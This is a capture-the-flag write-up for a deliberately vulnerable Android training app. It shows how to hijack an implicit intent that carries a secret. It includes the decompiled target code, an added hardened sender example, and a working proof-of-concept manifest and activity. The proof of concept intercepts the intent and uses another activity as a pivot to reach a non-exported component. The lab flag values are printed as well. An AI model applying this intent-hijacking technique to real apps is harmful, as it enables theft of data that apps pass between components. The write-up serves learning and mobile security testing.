Static Analysis
AndroidManifest.xml
Upon inspecting Flag10Activity in the AndroidManifest.xml file, we see the following:

    <activity
        android:name="io.hextree.attacksurface.activities.Flag10Activity"
        android:exported="false"/>

Since exported is set to false, we can’t call this activity directly from our exploit APK, but as we saw with Flag5Activity, we can use that activity as our pivot.
Flag10Activity Class
    public class Flag10Activity extends AppCompactActivity {
        public Flag10Activity() {
            this.name = "Flag 10 - Hijack implicit intent with the flag";
            this.tag = "ImplicitIntent";
            this.tagColor = R.color.red;
            this.flag = "qq51kWPLVous73Vn3R6HuU1897f/Nq8tGvdjpJ7GQRW9/s9oCLN5lr9hjvVIHyUf";
        }

        @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
        protected void onCreate(Bundle bundle) {
            super.onCreate(bundle);
            this.f = new LogHelper(this);
            if (getIntent().getAction() == null) {
                Toast.makeText(this, "Sending implicit intent with the flag\nio.hextree.attacksurface.ATTACK_ME", 1).show();
                Intent intent = new Intent("io.hextree.attacksurface.ATTACK_ME");
                intent.addFlags(8);
                this.f.addTag(intent);
                intent.putExtra("flag", this.f.appendLog(this.flag));
                try {
                    startActivity(intent);
                    success(this);
                } catch (RuntimeException e) {
                    e.printStackTrace();
                    Toast.makeText(this, "No app found to handle the intent\nio.hextree.attacksurface.ATTACK_ME", 1).show();
                    finish();
                }
            }
        }
    }

Upon reviewing the code, we see that when this class is called it sends an implicit intent with the io.hextree.attacksurface.ATTACK_ME action, carrying the flag in the flag extra, and if it finds an activity that can handle that action it will print the flag. So we just need to create a class to receive that intent :)
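The sender-side fix for this pattern, as an added example that is not part of the original write-up or the target app (the class SafeFlagSender and its method names are hypothetical). It contrasts the implicit send seen in Flag10Activity with a form that restricts resolution to the app's own package and fails closed otherwise:

```java
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;

/** Added example: hypothetical helper, not code from the target app. */
public final class SafeFlagSender {
    private static final String ACTION = "io.hextree.attacksurface.ATTACK_ME";

    private SafeFlagSender() {}

    /** Pattern from Flag10Activity: any app with a matching filter may receive the extra. */
    static Intent buildImplicit(String secret) {
        Intent intent = new Intent(ACTION);
        intent.putExtra("flag", secret);
        return intent;
    }

    /**
     * Hardened form: limit resolution to our own package and pin the resolved
     * component, so a third-party intent filter can never match.
     * Returns null when no single in-package activity handles the action.
     */
    static Intent buildPinned(Context ctx, String secret) {
        String self = ctx.getPackageName();
        Intent intent = new Intent(ACTION);
        intent.setPackage(self);
        ResolveInfo target = ctx.getPackageManager()
                .resolveActivity(intent, PackageManager.MATCH_DEFAULT_ONLY);
        // If several activities match, the system resolver (another package)
        // may be returned; treat that, and no match at all, as a failure.
        if (target == null || target.activityInfo == null
                || !self.equals(target.activityInfo.packageName)) {
            return null; // fail closed: the secret is never attached
        }
        intent.setComponent(new ComponentName(self, target.activityInfo.name));
        intent.putExtra("flag", secret); // attach the secret only after pinning
        return intent;
    }
}
```

A caller starts the activity only when buildPinned returns a non-null intent.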
Creating POC
AndroidManifest.xml
The first thing we want to do is set the exported option to true so other apps can call this activity.
Secondly, we need to make this activity a default receiver for the io.hextree.attacksurface.ATTACK_ME action, so when the target fires an implicit intent with this action it goes to our activity.

    <activity
        android:name=".Flag10"
        android:exported="true">
        <intent-filter>
            <action android:name="io.hextree.attacksurface.ATTACK_ME" />
            <category android:name="android.intent.category.DEFAULT" />
        </intent-filter>
    </activity>

Flag10.java
Now we create an activity that receives the intent and prints the extra called flag.
We also use the pivot utility, which uses Flag5Activity as a pivot, to call Flag10Activity, since it’s not exported and we can’t call it directly.

    import android.content.ComponentName;
    import android.content.Intent;
    import android.os.Bundle;
    import android.util.Log;
    import android.view.View;
    import android.widget.Button;
    import androidx.appcompat.app.AppCompatActivity;

    // PivotIntent and Utils are helper classes from this exploit project.
    public class Flag10 extends AppCompatActivity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_flag10);
            getSupportActionBar().setTitle("Flag 10");
            Button button = findViewById(R.id.button_flag10);
            button.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View v) {
                    Log.v("Flag 10 - Debug", "Going to flag 10 activity");
                    // 1. Create the final destination intent
                    Intent targetIntent = new Intent();
                    targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag10Activity"));
                    // 2. Use the PivotIntent utility to create the wrapped intent
                    Intent pivot = PivotIntent.create(targetIntent);
                    // 3. Start the activity
                    startActivity(pivot);
                }
            });
            // Check whether the received intent carries any extras
            // If it does, print the `flag` extra
            if (getIntent().getExtras() != null) {
                Intent receivedIntent = getIntent();
                Utils.showDialog(Flag10.this, receivedIntent);
                Log.v("Flag10 - Flag", String.valueOf(receivedIntent.getStringExtra("flag")));
            }
        }
    }

Flag
HXT{hijacked-intent-with-flag-dsui2908}